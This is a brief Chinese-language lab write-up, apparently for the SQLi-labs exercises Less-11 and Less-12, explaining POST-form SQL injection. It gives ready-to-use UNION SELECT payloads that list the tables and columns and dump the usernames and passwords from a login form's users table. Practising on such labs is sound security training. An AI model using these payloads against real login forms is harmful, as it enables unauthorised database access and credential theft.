这关是post注入的世界,post注入就是表单中填好数据通常会被送到服务器,然后由服务器将其发送到它要去的地方(比如,送到一个服务器网关程序中,然后由这个程序对其进行处理)。
不显示东西,那么加引号等一切简单的注入,发现他的sql查询语句是 select username,password from users where username='inputuname' and password='inputpass'
利用万能密码 (列举一些)
可以看出爆出来了数据,然后利用order by ,union select 可以进行简单的注入,可观察到有两个字段,接下来看图吧
uname=1' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=123&submit=Submit
uname=1' union select database(),group_concat(column_name) from information_schema.columns where table_schema=database() #&passwd=123&submit=Submit
uname=1' union select group_concat(username),group_concat(password) from users#&passwd=123&submit=Submit
Less-12和Less-12不同的就是他的后台sql语句是select username,password from users where username=("inputuname") and password="(inputpass"),其他的和LEss-11一样,开启你的操作吧!